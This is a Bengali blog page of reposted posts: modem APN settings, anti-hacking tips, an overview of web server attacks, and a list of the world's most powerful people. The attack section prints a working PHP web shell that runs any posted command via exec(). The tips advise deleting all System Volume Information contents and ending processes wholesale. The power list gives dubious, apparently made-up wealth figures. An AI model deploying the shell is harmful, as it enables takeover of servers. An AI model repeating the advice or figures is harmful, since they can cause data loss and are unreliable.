80s toys - Atari. I still have

 

 

জিপি মডেম দিয়েই নেটইউজ করুন যে কোন অপারেটরের

Posted by MD.RAFIKUL ISLAM,

জিপি কানেকশন আর জিপি মডেম নিয়ে অনেকই
হয়তো বিপাকে পড়েছেনকোন সময় নেট স্পিড কম
আবার কোন সময় ভালো কোন প্যাকেজ নাইএর
সাথে নতুন সমস্যা যুক্ত হয়েছে বাংলাদেশ
থেকে জিপি ইউজাররা ব্লগস্পট সাইট ওপেন
করতে পাড়ছেন নাসব ব্যাপার গুলো ভেবেই
অনেকে হয়তো চাচ্ছেন জিপি বাদ দিয়ে অন্য কোন
অপারেটরের নেট কানেকশন চালাবেনকিন্তু
বাধ সাধে আবার সেই জিপি মডেমজিপির মডেম
দিয়ে তো আর অন্য কানেকশন চালান যাবে না,
আরেক টা মডেম কিনতে হবে আরও কিছু টাকার
ধাক্কাআর এতসব ভেবেই চ্যাঞ্জ করার
হচ্ছেনা দুনিয়ার সবচেয়ে ফালতু কানেকশন আজ
আমি আপনাদের মাঝে যে ব্যাপারটা শেয়ার
করতে যাচ্ছি টা হচ্ছে... আপনি জিপি মডেম
দিয়েই অন্য যে কোন অপারেটরের নেট কানেকশন
চালাতে পারবেনএভাবে হয়তো অনেকেই
চালাচ্ছেন কিন্তু আমার মনে হয়
না জানা লোকের সংখ্যাই অনেকে অনেক বেশি আর
তাদের জন্যই আমার আজকের এই টিউনচলুন
দেখে নেয়া যাক কিভাবে জিপি মডেম দিয়ে অন্য
অপারেটরের নেট চালান যায়...
প্রথমে জিপি মডেমের বাইডিফল্ট সফটওয়্যার
টি ওপেন করুনএখন উপরেরে দিকের টুলস
থেকে অপশন এ ক্লিক করুন (Tools > Options)

01 এখন যে পেজ টা আসবে ওখান
থেকে আপনাকে প্রফাইল ম্যানেজমেন্ট এ ক্লিক
করতে হবে,

02 প্রফাইল নাম হিসাবে জিপি ইন্টারনেট
দেয়া থাকবে কিন্তু নতুন কানেকশনটার জন্য
এখানে আপনাকে একটা নতুন প্রফাইল
তৈরি করতে হবেডান দিকে New এ ক্লিক করুন

03 নিচের পেজটার মতো একটা পেজ ওপেন হবে...
এখনে আপনাকে Profile Name, APN এবং Access
Number দিয়ে একটা নতুন প্রফাইল করতে হবে

04 আচ্ছা চলুন কোন ইন্টারনেট কানেকশন এর জন্য
কিভাবে আমরা কনফিগার করবো স্ক্রিন শটের
মাধ্যমে দেখে নেয়া যাক
 

একটেলের জন্যঃ


Profile Name Aktel type করুনAPN টা Static
Select করে বক্সে internet/robi লিখুন
এখানে Access Number হিসাবে *99#
দেয়া থাকবে আর যদি না থাকে তবে আপনাকে *99#
লিখতে হবেএখন Save এ ক্লিক করে Profile সেভ
করুন এবং OK চেপে বেড়িয়ে আসুন

06 এখন মডেমে আপনার একটেল সিম ভোরে নিন আর
জিপি'র ডিফল্ট Software এর Connection পেজ
থেকে GP-internet এর পরিবর্তে Aktel কে Select
করে Connect Click করুন ব্যস
হয়ে গেলে জিপি মডেমে একটেল নেট চালু
 

বাংলালিংকের জন্যঃ


Profile Name Banglalink type করুনAPN
টা Static Select করে বক্সে blweb লিখুন
এখানে Access Number হিসাবে *99#
দেয়া থাকবে আর যদি না থাকে তবে আপনাকে *99#
লিখতে হবেএখন Save এ ক্লিক করে Profile সেভ
করুন এবং OK চেপে বেড়িয়ে আসুন

04 এখন মডেমে বাংলালিংক সিম ভোরে নিন আর জিপি'
ডিফল্ট Software এর Connection পেজ থেকে GP-
internet এর পরিবর্তে Banglalink কে Select
করে Connect Click করুন ব্যস
হয়ে গেলে জিপি মডেমে বাংলালিংক নেট চালু
 

ওয়ারিদের জন্যঃ


Profile Name Warid Internet type করুন
APN টা Static Select করে বক্সে internet
লিখুনএখানে Access Number হিসাবে *99#
দেয়া থাকবে আর যদি না থাকে তবে আপনাকে *99#
লিখতে হবেএখন Save এ ক্লিক করে Profile সেভ
করুন এবং OK চেপে বেড়িয়ে আসুন

05 এখন মডেমে আপনার ওয়ারিদ সিম ভোরে নিন আর
জিপি'র ডিফল্ট Software এর Connection পেজ
থেকে GP-internet এর পরিবর্তে Warid Internet
কে Select করে Connect Click করুন ব্যস
হয়ে গেলে জিপি মডেমে ওয়ারিদ নেট চালু
 

টেলিটকের জন্যঃ


Profile Name Teletalk type করুনAPN
টা Static Select করে বক্সে gprsunl লিখুন
এখানে Access Number হিসাবে *99#
দেয়া থাকবে আর যদি না থাকে তবে আপনাকে *99#
লিখতে হবেএখন Save এ ক্লিক করে Profile সেভ
করুন এবং OK চেপে বেড়িয়ে আসুন

সুত্র: ইন্টারনেট।

 

 

 

 

 

 

হ্যাকার দের হাত থেকে বাঁচার কিছু সাধারণ টিপস

Posted by MD.RAFIKUL ISLAM,

 

ইন্টারনেট ব্যবহার করতে গিয়ে অনেক সময় হ্যাকিংয়ের শিকার হতে হয় ফলে ই-মেইলের অথবা ফেসবুকের পাসওয়ার্ড চুরি হয়ে যায় তবে কিছু সাবধানতা অবলম্বন করে অনেকটা নিরাপদ থাকা সম্ভব

*
কখনো অপ্রত্যাশীত মেইল থেকে কোন কিছু ডাউনলোড করবেন না প্রয়োজনে ইমেইলে ভিউ করুন

*
আপনার পাসওয়ার্ড রিকভারী প্রশ্নের উত্তর গুলো আনকমন বা কঠিন দিন কখনো নিজের মোবাইল নং ব্যবহার করবেন না
*
অবশ্যই পাসওয়ার্ড রিকভারী ইমেইল ঠিকানাটি গোপন রাখুন
*
নোটপ্যাডে তৈরি করা কোনো ফাইল খুলতে সাবধানতা অবলম্বন করুন
*
অচেনা সন্দেহজনক কোনো ই-মেইল ঠিকানা থেকে মেইল এলে তার উত্তর না দেওয়াই ভালো
*
যে কোন ফাইল স্ক্যান করে খুলুন এবং সন্দেহজনক কোনো ফাইল না খুলা ভাল
*
ব্যক্তিগত কাজে যে ই-মেইলটি ব্যবহার করেন সেটি অপরিচিতদের কাছে প্রকাশ না করা ভাল
*
মেইলের পাসওয়ার্ডের মাঝে সবসময় সাংকেতিক চিহ্ন ব্যবহার করুন,
যেমনঃ $ ^ % * & ! ~ ` ? “ \ + ; ‘ { } ইত্যাদি

হ্যাকাররা সাধারণত গোপন সফটওয়্যারের সাহায্যে যেমন কীলগার এর মধ্যমে অন্যের ব্যক্তিগত তথ্য/পাসওয়ার্ড চুরি করে অর্থা আপনি যখন ইন্টারনেটে বিভিন্ন সাইটের পাসওয়ার্ড/ইউজারনেম লিখে থাকেন, তখন তার সবই কিবোর্ডে রেকর্ড হয়ে থাকে তবে আপনি ইচ্ছে করলে মোজিলা ফায়ারফক্সে KeyScrambler Personal নামের একটি অ্যাডঅনের সাহায্যে কিবোর্ডের গোপন রেকর্ড বন্ধ করতে পারেন
অথবা যদি আপনি কী লগার জাতীয় কিছু SPY এর শিকার হন তবে প্রথমেই Ctrl+Alt+Del চাপুন এবং User Name তালিকা থেকে System Local Service ছাড়া সব কিছু একটি একটি করে End Process করুন

কীলগারটি যদি ডাউনলোড করে থাকেন তবে তা একনই ডিলিট করুন

Start/Programs/Startup
থেকে অপরিচিত বা সন্দেহমূলক প্রোগ্রাম ডিলিট করুন

এখন My Computer/Tools/Folder Options/View এ ক্লিক করুন এবং নিচেরর ছবির মত করে সিলেক্ট করুন

 

এর পর My Computer থেকে সবগুলো পাটিশনের System Volume Information নামক হিডেন ফোল্ডারটি ওপেন করুন এবং ভিতরের যত ফাইল এবং যত ফোল্ডার আছে সকল সব ডিলিট করুন এ সময় অবশ্যই আপনার কম্পিউটার এর এন্টিভাইরাস চালু রাখবেন

আপনার ফেসবুক এ্যাকাউন্ট এর পাসওয়ার্ড এর প্রতি বেশি লক্ষ থাকতে পারে হ্যাকাররা তাই ফেসবুকের ই-মেইল গোপন রাখুন না হয় আরও ভাল হয় আপনার মোবাইল নাম্বার দিয়ে যদি রেজিস্ট্রেশন ফেসবুক এ্যাকাউন্ট তাহলে মোবাইল নাম্বার দিয়ে লগইন করতে পারবেন তাহলে আর বেশি হ্যাক হওয়ার সম্ভাবনা থাকবেন

: এখান হতে নেয়া


 

 

 

 

 

ওয়েব সার্ভারে আক্রমন করা :

 

1. SQL Injection
2. PHP Remote Code Execution
3. Web Ripping
4. Google Hacking

SQL Injection :

SQL Injection হচ্ছে একধরনের আক্রমন প্রক্রিয়া যাতে ফায়ারওয়াল দিয়ে রক্ষিত ডাটাবেসের ডাটা সমূহে টার্গেট করা হয়এটা ওয়েব নির্ভর যেকোন এ্যাপ্লিকেশনের প্যারামিটার পরিবর্তনের চেষ্টা করে যা এসকিউএল নির্ভর কোন সার্ভারথেকে ডাটা সংরক্ষন করতে ব্যবহৃত হয়

সাধারনত, প্রথম পদক্ষেপে এটা কোন আক্রমন উপযোগী ওয়েব এ্যাপ্লিকেশন অরক্ষিত করেএই এ্যাটাকটি ঐ ওয়েব এ্যাপ্লিকেশনটির দুর্বল কোডিং এবং ওয়েবসাইট এডমিনের সুযোগ গ্রহন করে

একটি SQL Injection এর মাধ্যমে কোন আক্রমন উপযোগী ওয়েব সার্ভারকে আক্রমনের মাধ্যমে এর কর্তৃত্ব নেয় যাতে করে ঐ সার্ভার ডাটাবেসের যেকোন তথ্য পড়া, পরিবর্তন করা বা মুছে দেয়া যায়

ধারনা :

SQL Injection এ ইউজার SQL কোয়েরীতে স্থাপিত যেকোন ডাটার কন্ট্রোল নিতে পারে কোনরকম ডাটার শুদ্ধতা পরীক্ষা করা ছাড়াইএর দ্বারাই ইন্টারনেটে প্রতিদিন হাজার হাজার ওয়েব এ্যাপ্লিকেশন ক্ষতিগ্রস্থ হচ্ছে বর্তমানে ইন্টারনেটে প্রায় ৫০% বড় ই-কমার্স সাইট এবং ৭৫% ছোট ই-কমার্স সাইট এই আক্রমন উপযোগীকোন ওয়েবসাইটে যদি CFML, ASP, JSP এবং PHP এর অসম ব্যবহার থাকে তাহলে ঐ সকর সাইট এই আক্রমনের উপযোগী

SQL Injection এ ভ্যালিডেশন প্রবেশ করানো :

  • SQL Injection আক্রমন প্রশমিত করার জন্য কিছু টুলস বা পরিকল্পনা রয়েছে
  • ওয়েব ডেভেলোপাররা লগইন পেজে কিছু সন্ধিগ্ধ কারেক্টার প্রবেশ করায় যেমন: ‘, “, , , — ,
  • ডাটাবেসে সবসময় পাসওয়ার্ডগুলো এনক্রিপ্ট করে রাখা
  • এই পদ্ধতিগুলোর সঠিক ব্যবহারেও এসকিউএল প্রতিরোধ করা যায় না, কিন্তু এগুলো হ্যাকারের হ্যাকিং কার্য কঠিন করে দেয়

PHP Injection :

  • এই আক্রমন কোন টার্গেট ওয়েব সার্ভারের সিস্টেম লেভেল ভেঙ্গে ফেলতে ব্যবহৃত হয় এই আক্রমনের দরুন, হ্যাকার ওয়েবসার্ভারটিতে প্রবেশ করতে পারে এবং এর সমস্ত ফাইলের কর্তত্ব নিয়ে নিতে পারে

Script :

1.<form action=" " method=post>

2.<input type=text name=command>

3.<input type=hidden name=filled value=1>

4.<input type=submit value="Run Command">

5.</form>

6.<?php 

7.if($_post[filled]==1)

8.{

9.$output=exec("$_post[command]")

10.print $output;

11.}

12.?>

Counter Measure :

এটা আপনার সার্ভারে তথ্য সাপ্লাইয়ের পূর্বেই ইউজারের দেয়া তথ্যাদির সত্যাদি পরীক্ষা করে দেথে, এটা সাধারনত জাভাস্ক্রিপ্ট বা অন্য কোন ফিল্টারিং মাধ্যমে ব্যবহৃত হয়

Web Ripping :

  • ওয়েব রেপিং কোন নির্দিষ্ট ওয়েবসাইটের ঠিকানা থেকে ছবি বা ইমেজ বা অন্যান্য মিডিয়া ফাইল খুজে বের করে তা এক্সট্রাক্ট করে এবং আপনার হার্ড ড্রাইভে তা সংরক্ষন করে রাখে
  • ওয়েব রেপিং কোন ওয়েবসাইটটির সম্পূর্ণ গঠন আপনার হার্ড ড্রাইভে সংরক্ষনের ক্ষমতা রাখে

সাবধানতা :  আপনি ওয়েবসাইটটির এডমিন কর্তৃক ধরা পড়ে যেতে পারেন কারন আপনিতো সেখানে একটি সাধারন ইউজার হিসেবে প্রবেশ করেছেন যাতে করে কর্তৃপক্ষ আপনার আইপি বাতিল করে দিতে পারে বা ঐ সার্ভারটি থেকে আপনার সংযোগ প্রকৃয়া কেটে দিতে পারে

ওয়েব রেপিংয়ে ব্যবহৃত কিছু টুলস :

1). Black Widow.
2). Wget
3). Web Sleuth.

Google Hacking :

ইন্টারনেটের প্রায় ৮০ ভাগ সার্চ কোয়েরী আসে গুগলের সার্ভার থেকেএটা বর্তমানে সর্বাপেক্ষা শক্তিশালী এবং জনপ্রিয় সার্চ ইঞ্জিনে পরিনত হয়েছে এটার জনপ্রিয়তা এর সার্চ ক্ষমতা থেকেই আসে নি, বরং এটার কোয়েরী বা ইনডেক্সিং করার ক্ষমতা থেকেই এসেছেযাহোক, আমাদের মনে রাখা উচিত যে, ইন্টারনেট হচেছ একটি উচ্চ ক্ষমতা সম্পন্ন মাধ্যম, যার কারনে গুগল যে রেজাল্টগুলো দেয় তা সবসময় আপ-টু-ডেট হয়না বা কিছু তথ্য হয়ত চুরি হয়ে যায়এছাড়াও কিছু নিষিদ্ধ উপাদান গুগলবট (এটা গুগলের স্বয়ংক্রিয় স্ক্রিপ্ট যা ইন্টারনেটের সকল তথ্যাদি গুগল সার্ভারে জমা করে রাখে) দ্বারা ভিজিটও হয়নাআমরা জানি যে, গুগল একটা সার্চ ইঞ্জিন

গুগলের কিছু নির্দিষ্ট ষ্ট্রিং বা কমান্ড দিয়ে সার্চের মাধ্যমে গুগল কর্তৃক হ্যাকিং কার্য সম্পন্ন করা হয় যেটাকে গুগল এ্যাডভান্সড অপারেটর বলা হয়এর মাধ্যমেই দৈনিক লাখো লাখো ওয়েবসাইট বের করা হয় যেগুলো হ্যাকিং আক্রমন উপযোগী

 

টিউনটি পূর্বে এখানে প্রকাশিত

 

 

 

 

 

 

বর্তমান বিশ্বের সবচেয়ে ক্ষমতাধর দশজন

 ব্যক্তি

 

Posted by MD.RAFIKUL ISLAM,

ক্ষমতা সাময়িক একটা ব্যাপার। এটা কখনও স্হায়ী হয় না বরং ঘুরে ফিরে হাত বদল হয়। আজ যার ক্ষমতা রয়েছে কাল তিনি হয়ে যেতে পারে ক্ষমতাহীন আবার ক্ষমতাহীন হয়ে যেতে পারেন অতি ক্ষমতাবান। তারপরও বর্তমান পৃথিবীতে ক্ষমতা ও পজিশন একজন মানুষের জন্য অত্যন্ত গুরুত্বপূর্ন একটা বিষয়। তাই ক্ষমতা অর্জনের প্রতিযোগিতা বরাবরই সব যুগে লক্ষ্য করা গেছে। আসুন জেনে নেয়া যাক, বিশ্বের বর্তমান সবচেয়ে ক্ষমতাবান ব্যক্তিদের তালিকায় কারা শীর্ষে রয়েছেন।


 

১০) Bill Gates
সম্পত্তি রয়েছে : ৫৬ বিলিয়ন ডলার।
বর্তমান পৃথিবীতে সবচেয়ে ক্ষমতাবান ব্যক্তিদের তালিকায় দশম স্হানে রয়েছেন তিনি। ৫৫ বছর বয়স্ক বিল গেটস মাইক্রোসফটের কর্নধার এবং Bill & Melinda Gates ফাউন্ডেশনের কো-চেয়ারম্যান। তাছাড়া তিনি বিভিন্ন সামাজিক সেবামূলক কর্মকান্ডের সাথে জড়িত।
 

Gates ফাউন্ডেশনের কো-চেয়ারম্যান। তাছাড়া তিনি বিভিন্ন সামাজিক সেবামূলক কর্মকান্ডের সাথে জড়িত।




 

৯) Sonia Gandhi
সম্পত্তি রয়েছে : ১৮.৬৬ বিলিয়ন ডলার।
৬৪ বছর বয়সী সোনিয়া গান্ধি ভারতের কংগ্রেস দলের প্রেসিডেন্ট।ভারতের রাজনীতিতে সবচেয়ে ক্ষমতাবান নেত্রী,

যাকে ১.২ বিলিয়ন ভারতীয় নাগরিক একবাক্যে মান্য করেন।




 

৮) Ben Bernanke
বেতন পান : ১,৯৯,৭০০ ডলার।
Federal Reserve এর বর্তমান চেয়ারম্যান। তাঁর বয়স ৫৭ বছর। ব্যক্তি জীবনে তিনি অত্যন্ত সৎ এবং নির্ভরযোগ্যতার কারনে আমেরিকার সরকার তাকে যেকোন বিশেষ মুহূর্তে মার্কিন ডলার ছাপানোর অনুমতি দিয়ে রেখেছেন।




৭) David Cameron
সম্পত্তি রয়েছে : ৩০ মিলিয়ন পাউন্ড।
বেতন পান : ২,২৫,০০০ পাউন্ড।
বর্তমান ব্রিটিশ প্রধানমন্ত্রী David Cameron সেদেশের ইতিহাসে সবচেয়ে কনিষ্ঠতম প্রধানমন্ত্রী।




 

৬) Angela Merkel
সম্পত্তি রয়েছে : ১১.৫ মিলিয়ন ডলার।
বেতন পান : ৩,০৩,৮০০ ডলার।
বর্তমানে পৃথিবীর ৬ষ্ঠ ক্ষমতাধর এবং মহিলাদের মধ্যে ক্ষমতার র‌্যাংকে প্রথম স্হান অর্জনকারী ব্যক্তি তিনি।

তিনি Germany oversees Europe’s largest economy চ্যান্চেলর।




 

৫) Pope Benedict XVI
 

 

 

৪) Vladimir Putin
সম্পত্তি রয়েছে : ৪০ বিলিয়ন ডলার।
বেতন পান : ১,২৬,০০০ ডলার।
চার বারের রাশিয়ার প্রধানমন্ত্রীর তিনি। অত্যন্ত ক্ষমতাধন এবং আমেরিকা বিদ্বেষী হওয়ার কারনে তার আলাদা

কোটি ভক্ত রয়েছে।




৩) Abdullah bin Abdul Aziz al Saud
সম্পত্তি রয়েছে : পুরো সৌদিআরবের আক্ষরিক মালিক তিনি। যার পরিমান ৪৪৩.৬৯১ বিলিয়ন ডলার।

সৌদি আরবের বাদশাহ আব্দুল আজিজ ক্ষমতাধর তালিকায় ৩য় স্হানে রয়েছেন। বিশ্বের সবচেয়ে বড় তেলের

খনি রয়েছে তার দখলে।
 

 

২) Barack Obama
সম্পত্তি রয়েছে : ১০.১ মিলিয়ন ডলার।
বেতন পান : ৪,০০০০০ ডলার।
বর্তমান মার্কিন প্রেসিডেন্ট বারাক ওবামা সকলের কাছেই অতি পরিচিত এবং বর্তমান বিশ্বের সবচেয়ে ক্ষমতাধর

ব্যক্তিদের তালিকায় তিনি রয়েছেন ২য় স্হানে।
 



বর্তমানে বিশ্বের সবচেয়ে ক্ষতমাধর ব্যক্তি
Hu Jintao
বেতন পান : ৪,০০০০০ ডলার।
তিনি বর্তমানে গনপ্রজাতন্ত্রী চীন দেশের প্রেসিডেন্ট। বর্তমানে ১.৩ বিলিয়ন অর্থাৎ বিশ্বের মোট জনসংখ্যার

পাঁচ ভাগের এক ভাগের কর্তৃত্ব তার হাতে। যেকোন ধরনের কর্মকান্ডে তিনি কখনও কাওকে তোয়াক্কা করেন

না। বিশ্বের সবচেয়ে জনপ্রিয় ও শক্তিশালী রাজনীতিবিদ তিনি। বিশ্বের সবচেয়ে বড় ও অন্যতম শক্তিশালী

আর্মি ফোর্সের হেডও তিনি। তারই সুনিঁপুন ছোঁয়ায় চীন আজ বিশ্বের প্রথম কাতারের অর্থনৈতিক একটি

দেশে পরিনত হয়েছে।

 


 

 

 


তথ্য ও ছবি সংগ্রহ : http://exploredia.com/top-10-most-power … orld-2011/

 

সুত্র: আগে এখানে প্রকাশ হয়েছে ।

 

3 Responses

 

Leave a Reply